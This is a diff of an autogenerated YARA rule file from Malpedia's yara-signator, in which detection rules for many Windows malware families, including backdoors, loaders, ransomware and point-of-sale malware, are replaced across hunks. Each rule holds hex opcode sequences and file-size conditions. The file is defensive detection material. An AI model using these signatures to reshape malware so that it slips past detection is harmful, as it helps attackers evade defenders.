+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.applejeus_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "1b0b49a0bdf8cbe355d0f549d184abf36cc5a8a27ac3e4b70ddcdc76ec6e38f0"
+		logic_hash = "7da7577e0a48835aa3f87ca6b5019a6bd26bede335ed264656ca8273c5cb6ea4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128300,71 +128227,74 @@ rule MALPEDIA_Win_Flash_Develop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 56 33c9 57 0fb68170034200 99 8bf0 }
-		$sequence_1 = { 33fa 0fa4f708 c1e608 8934cd40484800 99 }
-		$sequence_2 = { c78424c8020000e0b04600 c78424cc02000068df4600 c78424d0020000b40d4700 c78424d4020000503e4700 c78424d8020000446e4700 c78424dc0200000c9d4700 c78424e0020000b0cc4700 }
-		$sequence_3 = { 891ccd28184800 892ccd2c184800 0fa4f710 c1e610 33f0 33fa 0fa4f708 }
-		$sequence_4 = { 33fa c1e308 892ccd2c204800 8bef 0fa4f708 891ccd28204800 8bde }
-		$sequence_5 = { 893ccd44484800 8bf0 8bfa 0fa4f708 }
-		$sequence_6 = { 892ccd34204800 8bef 0fa4f708 33fa 891ccd30204800 8bde c1e608 }
-		$sequence_7 = { c7842464010000240a4200 c7842468010000043a4200 c784246c01000070694200 c7842470010000cc9a4200 }
-		$sequence_8 = { 0fb68170054200 33ea 0fa4dd10 33fa 99 8934cd28304800 }
-		$sequence_9 = { 893ccd44404800 83c104 81f900010000 0f8c39f8ffff 5f 5e 5d }
+		$sequence_0 = { 8bb540eeffff 56 ff15???????? 56 ffd7 ffb5e0edffff ffd7 }
+		$sequence_1 = { 8bc8 51 e8???????? 83c404 c7460800000000 c7460400000000 ff36 }
+		$sequence_2 = { 8b75e4 83c410 0bf0 c745d8d4b24500 8d45dc 50 e8???????? }
+		$sequence_3 = { 8bf8 ffd6 ffb5b0fdffff 8bb588feffff 8bc8 b8ed73484d }
+		$sequence_4 = { 897008 e8???????? 8d8dd8ecffff e8???????? 8d8dd4efffff e8???????? 6a64 }
+		$sequence_5 = { 6a08 c645fc16 e8???????? 83c404 8985e4f6ffff 898568f4ffff c700???????? }
+		$sequence_6 = { 0f84d3000000 8b048d74db4500 8985a4f8ffff 85c0 0f8498000000 83f801 0f84b5000000 }
+		$sequence_7 = { 8bf0 6a0c 8975e4 8975d0 0f114604 c706???????? f30f7e45c4 }
+		$sequence_8 = { 8885fcfcffff 8b85dcfcffff 041d 83f05c 8885fdfcffff 8b85dcfcffff }
+		$sequence_9 = { 8b4308 33ff 807e2c00 8945c4 0f842e010000 8b4808 0f57c0 }
 
 	condition:
-		7 of them and filesize < 1111040
+		7 of them and filesize < 1245184
 }
-rule MALPEDIA_Win_Yibackdoor_Auto : FILE
+rule MALPEDIA_Win_Lock_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bd826b97-b05e-574c-adcf-8cef34bea245"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yibackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yibackdoor_auto.yar#L1-L131"
+		id = "66d7719a-09f7-5449-96c8-7a2badb35721"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lock_pos_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "72cc75115eff495a52d292944ce30cf871fe0425f0d810307073cc2873931dac"
+		logic_hash = "68264cf97fe11e22f20de5aa9fd8236aae89e24686e8c6b06c621f87466b5d04"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c897ddf 488b18 e8???????? 488d4d6f 4c8bc3 48894c2440 }
-		$sequence_1 = { 33f6 4d85db 744a 4f8d0c00 498bf8 4d85c0 7439 }
-		$sequence_2 = { 743f 4180f97b 0f84b6000000 4180f92d 740e 4180e930 4180f909 }
-		$sequence_3 = { 33c9 e8???????? 488b4def ffd0 4c3965f7 741e 41b9fc000000 }
-		$sequence_4 = { ff15???????? 488b5c2450 448d4fda 33d2 33c9 41b842a86f9e e8???????? }
-		$sequence_5 = { 488bd8 e8???????? 488bcb 4c8b4008 488b10 e8???????? 488d15cd5c0000 }
-		$sequence_6 = { 448bc2 41c1e803 4183f80a 7de8 4d85d2 7464 4885db }
-		$sequence_7 = { 458bfe e8???????? 4533c9 4489742420 4533c0 33d2 }
-		$sequence_8 = { c3 33d2 488bc1 4885c9 7505 c3 4883c102 }
-		$sequence_9 = { 488b5028 c745db05000000 e8???????? 488bd0 488d4de3 e8???????? }
+		$sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 }
+		$sequence_1 = { 8bec 837d0800 7704 33c0 }
+		$sequence_2 = { 6a00 6a23 6a00 ff15???????? 8d8df8fdffff }
+		$sequence_3 = { 55 8bec 81eca4040000 56 }
+		$sequence_4 = { 8d85f8fdffff 50 6a00 6a00 6a23 }
+		$sequence_5 = { 6a00 32db e8???????? 8bf8 59 59 85ff }
+		$sequence_6 = { 8b450c 85c0 740a 8b55f8 8911 8b4dfc 8908 }
+		$sequence_7 = { ff15???????? 85c0 7555 57 6a04 8d45e4 50 }
+		$sequence_8 = { 8b4de4 034804 894de4 8b55f0 8b45f0 034204 8945f0 }
+		$sequence_9 = { 6a04 8b4508 50 8d4dec 51 e8???????? 83c40c }
+		$sequence_10 = { 8908 837df400 740b 8b55f4 }
+		$sequence_11 = { 837dfc00 7414 8b450c 50 8b4d08 51 }
+		$sequence_12 = { 8b45dc 83e801 8945dc 85d2 0f843a010000 8b4df4 668b11 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Gopuram_Auto : FILE
+rule MALPEDIA_Win_Telepowerbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b03e678a-6ea1-5889-b388-a101df87e17a"
+		id = "4bff86f2-d32a-5469-938e-31ce8cf733ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gopuram_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telepowerbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.telepowerbot_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "6d230510a2c3f67fb9a008e4b353ed01e99faca2f2088eff568ec22152cbe40b"
+		logic_hash = "80a377e11ec6e9ac3641490e489c4670d07e0d249413d61709ebf14e5db777cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128378,34 +128308,34 @@ rule MALPEDIA_Win_Gopuram_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d15a3cb0200 488d0d645c0500 e8???????? 488d15c4c60200 488bc8 488b5c2430 4883c420 }
-		$sequence_1 = { e8???????? 85c0 743e 488d157b930500 488bcf e8???????? 85c0 }
-		$sequence_2 = { ff10 4c8bc7 ba10000000 488bcb e8???????? 488bc3 e9???????? }
-		$sequence_3 = { 7e1c 4183ff09 0f8eae000000 4183ff0a 750c 488d05833c0500 4889442450 }
-		$sequence_4 = { e8???????? 488d5606 488d4da8 41b802000000 66448965bc e8???????? 488d560c }
-		$sequence_5 = { 8be8 85ed 0f842f010000 488b5c2470 488d8b18010000 ff15???????? 498b06 }
-		$sequence_6 = { 8bd8 e8???????? 4c8d05df1e0800 41b9de010000 8bd7 498bce c744242000000000 }
-		$sequence_7 = { 85f6 0f8486050000 488b85600a0000 4889442440 c744242801000000 48895c2420 4533c9 }
-		$sequence_8 = { c705????????03400080 c705????????f4060780 890d???????? c705????????09000380 418bc4 413b7ffc 750d }
-		$sequence_9 = { 488bcd e8???????? 8bf8 85c0 782a 498bd6 488bcd }
+		$sequence_0 = { 6a01 68???????? 6a01 50 68???????? ff75f8 ffd6 }
+		$sequence_1 = { 817848d0924100 7409 ff7048 e8???????? 59 }
+		$sequence_2 = { ff348518234100 52 51 e8???????? 83c40c }
+		$sequence_3 = { 43 03c3 03c7 ff348518234100 52 51 e8???????? }
+		$sequence_4 = { eb55 0fb607 0fbe8800914100 41 894dd4 3bca 0f8f9e010000 }
+		$sequence_5 = { f20f59db 660f282d???????? 660f59f5 660f28aaf05e4100 660f54e5 660f58fe 660f58fc }
+		$sequence_6 = { eb07 8b04f5cc4e4100 5f 5e 5b }
+		$sequence_7 = { 8b8d84f8ffff 85c9 0f84b5050000 8b048d5c3d4100 8985a8f8ffff }
+		$sequence_8 = { c1ff06 6bd838 8b04bdf09d4100 f644032801 7444 837c0318ff }
+		$sequence_9 = { 85c9 0f84b5050000 8b048d5c3d4100 8985a8f8ffff 85c0 7562 }
 
 	condition:
-		7 of them and filesize < 1591296
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Zeoticus_Auto : FILE
+rule MALPEDIA_Win_Aresloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e7b44470-c2f9-5eee-bb9d-e8020120bbe3"
+		id = "f289d632-cafa-52d9-b441-3cf36142832f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeoticus_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aresloader_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9c3c5f162f682b504ac63e5a0d758fab5141989ce6052830dd9338be25cf4ff1"
-		score = 75
-		quality = 75
+		logic_hash = "7dea272de803a78d1da18f0ee0ed5e7c3024e3919d3d811c7316d385075c0ef8"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128417,32 +128347,32 @@ rule MALPEDIA_Win_Zeoticus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660f6e9c248c000000 660f62d8 0f29942490000000 660f6e942414010000 660f62ca 660f6e9424a0000000 0f295c2410 }
-		$sequence_1 = { b9d0fe4bac e8???????? 83c408 a3???????? 6a00 6a00 }
-		$sequence_2 = { 660feff0 8345f010 0f117710 8345ec10 83c720 0f1002 }
-		$sequence_3 = { 8d8690101000 8bd7 8d8ee8101000 50 83ec08 e8???????? }
-		$sequence_4 = { 0f286c2430 660fd4e0 0f29bc2490000000 660f73d03f 660f6eff 660fefe0 660f3a0fdd08 }
-		$sequence_5 = { 8b842498010000 898424f0000000 8b84249c010000 898424f4000000 8b8424a0010000 898424f8000000 8b8424a4010000 }
-		$sequence_6 = { 8b4618 314718 8b461c 31471c 8b4620 }
-		$sequence_7 = { 50 6a00 ff15???????? 85c0 0f84e7000000 33db 33c9 }
-		$sequence_8 = { 8b7020 03f3 0f1f4000 8b06 bac59d1c81 03c3 }
-		$sequence_9 = { 0f295c2410 0f28442410 660f62c1 660fd4c6 660f6ec9 660fd4c5 660f62ca }
+		$sequence_0 = { 895c2404 893424 e8???????? 85c0 7831 39d8 7205 }
+		$sequence_1 = { 39d8 7205 c6441eff00 83c41c 5b }
+		$sequence_2 = { 83ec1c 8b5c2434 8b742430 8b7c2438 8b6c243c 85db 7435 }
+		$sequence_3 = { 8b6c243c 85db 7435 85f6 7431 }
+		$sequence_4 = { 85f6 7431 896c240c 897c2408 895c2404 }
+		$sequence_5 = { 85db 7435 85f6 7431 896c240c }
+		$sequence_6 = { 8b5c2434 8b742430 8b7c2438 8b6c243c 85db 7435 85f6 }
+		$sequence_7 = { 85c0 7831 39d8 7205 }
+		$sequence_8 = { 7431 896c240c 897c2408 895c2404 893424 }
+		$sequence_9 = { e8???????? 85c0 7831 39d8 7205 c6441eff00 83c41c }
 
 	condition:
-		7 of them and filesize < 468992
+		7 of them and filesize < 2657280
 }
-rule MALPEDIA_Win_Tarsip_Auto : FILE
+rule MALPEDIA_Win_Mmon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75e9f569-8d36-54c4-8e68-bdfe5fadb50e"
+		id = "4eb1ee5b-1ba9-50c6-ae95-4549a25a6630"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tarsip_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mmon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d620ca424e61c9ab1970fe1ca1122ff88c39fb4068349c8790c7e61013d76968"
+		logic_hash = "76045ffea1c47426874a11f386aa4b20c1d58a676ebe84d462f434375b141ab2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128456,32 +128386,32 @@ rule MALPEDIA_Win_Tarsip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895c2420 885c2410 6a25 68???????? 8d4c2414 899c243c010000 e8???????? }
-		$sequence_1 = { 53 68???????? 8d4c247c c78424940000000f000000 899c2490000000 889c2480000000 }
-		$sequence_2 = { b001 894c2410 88442414 0f85ff000000 8b742434 8b4614 8b4e18 }
-		$sequence_3 = { 7210 8b9424dc000000 52 e8???????? 83c404 84db 745c }
-		$sequence_4 = { ff15???????? 5b 33c0 5e c3 57 6a00 }
-		$sequence_5 = { 885c2470 6a0e 68???????? 8d4c2474 899c24bc0e0000 e8???????? 68ff000000 }
-		$sequence_6 = { 51 c68424c801000000 e8???????? 8bbc248c000000 be10000000 83c40c 39b42494000000 }
-		$sequence_7 = { 50 52 53 e8???????? 8b8690830000 8b08 }
-		$sequence_8 = { 8d44242c 50 8d4c242c 51 8d542424 52 ffd6 }
-		$sequence_9 = { eb03 897e08 8b5118 392a 7520 807f4500 7404 }
+		$sequence_0 = { 8bf8 8b4710 3bc8 770d 83c8ff 8bf7 e8???????? }
+		$sequence_1 = { 837e0800 7610 8b4608 8d80ec584200 fe08 803800 }
+		$sequence_2 = { e8???????? ebd2 8bc3 c1f805 8d3c85606a4200 8bf3 83e61f }
+		$sequence_3 = { ff15???????? 899ec0000000 899ec4000000 c786c8000000e0e74100 c786cc00000068ec4100 c786d0000000e8ed4100 }
+		$sequence_4 = { 68???????? 8d4df4 51 c745f440e24100 }
+		$sequence_5 = { 8bc8 894de4 85c9 747b 8b55d4 85d2 }
+		$sequence_6 = { 83e71f c1e706 8b0485606a4200 8d44380c }
+		$sequence_7 = { 8bc8 c1f905 8d3c8d606a4200 8bf0 83e61f c1e606 8b0f }
+		$sequence_8 = { 8b0d???????? 85c9 7406 8b55ec }
+		$sequence_9 = { 6a00 8bf1 c745d000000000 ff15???????? 8bf8 33c0 4f }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 356352
 }
-rule MALPEDIA_Win_Atomsilo_Auto : FILE
+rule MALPEDIA_Win_Shakti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a4d686f-c99d-5c01-b555-7095e6b70c0c"
+		id = "46b500e9-a975-5cdc-a985-5108deee61aa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atomsilo_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shakti_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "8aed315237abd1e84c2f2f4a7b7891e44774fb638cce5cdf1ee6cabd913c51c4"
+		logic_hash = "b5c0b26c5dc41457d9e16bd381b5ef6f5c4b5edd5ff24e7078690fca0d450c8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128495,90 +128425,77 @@ rule MALPEDIA_Win_Atomsilo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48c7c03f000000 23c1 488d0d7a8d0100 f20f5904c1 f20f5804c1 660f72e406 660f73f434 }
-		$sequence_1 = { 90 488d4f78 488d542458 e8???????? 488bd8 488b4c2470 48394c2468 }
-		$sequence_2 = { 4053 4883ec20 488d054b400800 488bd9 488901 488d052e420800 48894108 }
-		$sequence_3 = { 480134c7 0f8593010000 ffc1 8bc1 493bc0 72ed 488b5318 }
-		$sequence_4 = { 48c7442458ffffffff 4c89742460 4d85f6 7505 498bef eb0b 498bce }
-		$sequence_5 = { 4183cf08 44897c2420 4c8d4c2458 4c8bc6 488d55b8 488d4d88 e8???????? }
-		$sequence_6 = { 4103c7 c1ca02 448b7c2408 03c8 4403c9 4433ff }
-		$sequence_7 = { 8bc9 488b542430 8b0c8a c1e908 0fb6c9 488d1554b50500 }
-		$sequence_8 = { 488d0dda730900 8b542440 83c202 8bd2 4c8b442430 418b1490 c1ea10 }
-		$sequence_9 = { 488bd0 488bcb e8???????? 4103f5 413bf4 72c1 488b45a7 }
+		$sequence_0 = { 894df0 e9???????? 8b55fc 83c214 }
+		$sequence_1 = { 894dfc e9???????? 8b55f8 8b45d8 }
+		$sequence_2 = { 8945ec 8b4dec 8b55c0 0311 8955d0 8b45d0 8b4dc0 }
+		$sequence_3 = { 894dcc 8b55fc 83c208 8955f0 8b45cc }
+		$sequence_4 = { 8b4de0 8b11 8955e0 e9???????? 8b45d8 }
+		$sequence_5 = { 894df0 8b55fc 8b45d8 034210 8945e0 8b4de0 }
+		$sequence_6 = { 0311 8b45e0 8910 eb1e 8b4de0 8b55d8 0311 }
+		$sequence_7 = { 8955f8 8b45f8 813850450000 7502 eb0b 8b4dc0 83e901 }
+		$sequence_8 = { ff75f4 8b35???????? ffd6 53 ff750c 8945f4 }
+		$sequence_9 = { 50 ff7594 e8???????? 2b7598 ff7598 }
+		$sequence_10 = { 8945f8 8b801c090000 8945fc ff75f8 68edacef0d 8b45fc ffd0 }
+		$sequence_11 = { 894810 894808 c3 56 }
+		$sequence_12 = { 3b1cfdb0a24000 7409 47 897dfc 83ff17 72ee 83ff17 }
+		$sequence_13 = { 66837d6c01 7308 893d???????? eb14 8b07 a3???????? 833d????????ff }
+		$sequence_14 = { 83ec1c 53 8b1d???????? 85db 0f84dd000000 8d45e4 }
+		$sequence_15 = { 0f848a000000 ff750c 8d45f8 ff7508 8d4df0 e8???????? }
 
 	condition:
-		7 of them and filesize < 1785856
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Tidepool_Auto : FILE
+rule MALPEDIA_Win_Unidentified_081_Auto : FILE
 {
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79b9a91d-2f80-54a4-850d-1eac43bf12cc"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tidepool_auto.yar#L1-L262"
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "4bef4e35-3450-5f50-98ad-424279417112"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_081_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a70dd848875168b4bad1ed7e445677eb0934ca243a590965d7d194a18350ca55"
+		logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f 5e 5b 8b8d00030000 }
-		$sequence_1 = { 8b8d00030000 33cd e8???????? 81c504030000 }
-		$sequence_2 = { 6a00 50 8b08 ff91a4000000 }
-		$sequence_3 = { 8bc6 5e c20400 80790800 c701???????? 740e 8b4904 }
-		$sequence_4 = { 53 6a02 8bf1 e8???????? }
-		$sequence_5 = { 83c40c 803d????????37 7518 68???????? }
-		$sequence_6 = { 6800000040 8d4500 50 ff15???????? }
-		$sequence_7 = { 83e906 51 83c006 50 6a02 }
-		$sequence_8 = { 681f000200 56 68???????? 6801000080 }
-		$sequence_9 = { 5e 5f 5b c9 c3 ff25???????? 51 }
-		$sequence_10 = { e8???????? 68???????? 68???????? 68???????? 8d4500 }
-		$sequence_11 = { 75f9 b8???????? b900000400 c60000 40 49 }
-		$sequence_12 = { 8b08 ff91a4000000 8b4654 6a01 }
-		$sequence_13 = { 8d5658 52 50 ff91d0000000 }
-		$sequence_14 = { 6810270000 ff15???????? 8b45ec 8b08 }
-		$sequence_15 = { 7509 8b4654 50 8b08 ff5138 47 }
-		$sequence_16 = { 40 49 75f9 b8???????? b900000400 }
-		$sequence_17 = { 8d45ec 50 681f000200 53 68???????? }
-		$sequence_18 = { 56 8bf1 e8???????? 8b4654 6a00 }
-		$sequence_19 = { 6802020000 ff15???????? 68???????? ff15???????? 8bf8 }
-		$sequence_20 = { 2bca 33d2 85c9 894c2410 89542414 }
-		$sequence_21 = { 89442424 7e13 51 8d542428 }
-		$sequence_22 = { ff75ec ff15???????? 8b35???????? 6a04 }
-		$sequence_23 = { 53 50 ff75f8 ff75e4 ff75fc ff15???????? }
-		$sequence_24 = { 7504 802000 4b 57 }
-		$sequence_25 = { 59 ff15???????? 8b4df8 8945d8 8b45fc 8d840832010000 }
-		$sequence_26 = { 56 e8???????? 8b7d08 57 e8???????? d1e0 }
-		$sequence_27 = { 895dd4 895dac 895de0 885def 895de8 66ab }
-		$sequence_28 = { 3bf3 7e16 e8???????? 6a1a }
+		$sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 }
+		$sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 }
+		$sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 }
+		$sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff }
+		$sequence_4 = { 8b7508 c7465c48554100 83660800 33ff }
+		$sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 }
+		$sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 }
+		$sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 }
+		$sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff }
+		$sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? }
 
 	condition:
-		7 of them and filesize < 1998848
+		7 of them and filesize < 273408
 }
-rule MALPEDIA_Win_Gaudox_Auto : FILE
+rule MALPEDIA_Win_Mistpen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e48a9725-6218-5ef6-9a1a-6786debab3b4"
+		id = "da7a11f3-113a-5db0-8b14-11346c846c77"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gaudox_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistpen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mistpen_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "cc9ffbe1e9e9b635f7f04ba1adabaa59f1b5b2df83ed09fa49e4be99cd0578aa"
+		logic_hash = "70ffa3f473a1017022fe8085a2fe1094ee2434500473a4c1dd94bcb7c2db0a7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128592,32 +128509,32 @@ rule MALPEDIA_Win_Gaudox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f 5e 8be5 5d c20400 8b7c240c 8d44244c }
-		$sequence_1 = { 50 e8???????? a1???????? 8bb858010000 83ff20 772c 68???????? }
-		$sequence_2 = { 745c 85d2 7458 56 8b7508 85f6 }
-		$sequence_3 = { 660f7f842460030000 660f7f842470030000 660f7f842480030000 f3ab b982000000 89842460060000 }
-		$sequence_4 = { 8b4708 2bca 83c0fb 03c1 894201 8d45c4 }
-		$sequence_5 = { 8bc1 b9???????? 50 e8???????? 8b4c2440 8bc1 803900 }
-		$sequence_6 = { 8d8548feffff 50 e8???????? a1???????? 8bb888010000 83ff1c 7731 }
-		$sequence_7 = { 0f88ce000000 8b15???????? b8???????? ff7750 8b7c2450 2bc2 8944245c }
-		$sequence_8 = { 6a01 e8???????? 8b55fc 8bc8 8b45f4 890c82 85c9 }
-		$sequence_9 = { 731a 8bd1 b9???????? e8???????? 85c0 0f88a7000000 8b74240c }
+		$sequence_0 = { 7602 ffc0 4585c0 8bf0 }
+		$sequence_1 = { 420fb6842090960200 4433d8 45335ffc 4533da 458bd3 45895e20 4533d0 }
+		$sequence_2 = { 4533848460850200 410fb6c3 4533848460750200 400fb6c7 4533848490920200 4533465c 418bc0 }
+		$sequence_3 = { 4403c1 418bcb 410bca 458bc8 23cf 41c1c91b }
+		$sequence_4 = { 4c8d0d74d70000 b919000000 4c8d0564d70000 488d1561d70000 e8???????? 4885c0 7420 }
+		$sequence_5 = { c1e31e 8bcf 410bcd 8bc7 4123cf 4123c5 0bc8 }
+		$sequence_6 = { 458b8c9460810200 4133bc8490920200 418bc0 41337e20 c1e808 0fb6c8 8bc3 }
+		$sequence_7 = { 83f838 7cec 8b4c2458 8bc1 c1e818 884594 8bc1 }
+		$sequence_8 = { 488d45e8 48894de8 488945f0 488d1590d10000 b805000000 894520 }
+		$sequence_9 = { 7e1d 488b5588 4c8d4c2450 458bc4 498bce }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
+rule MALPEDIA_Win_Shrinklocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d42e4503-ecb9-5c8a-a5c4-49076e4c4692"
+		id = "2766ab1f-0f76-5831-84d1-b9f95003f3f6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.molerat_loader_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shrinklocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shrinklocker_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fb8054083b6be147b0212c1c64a0a9853635b01e04e79803ccd8499a9a7c2505"
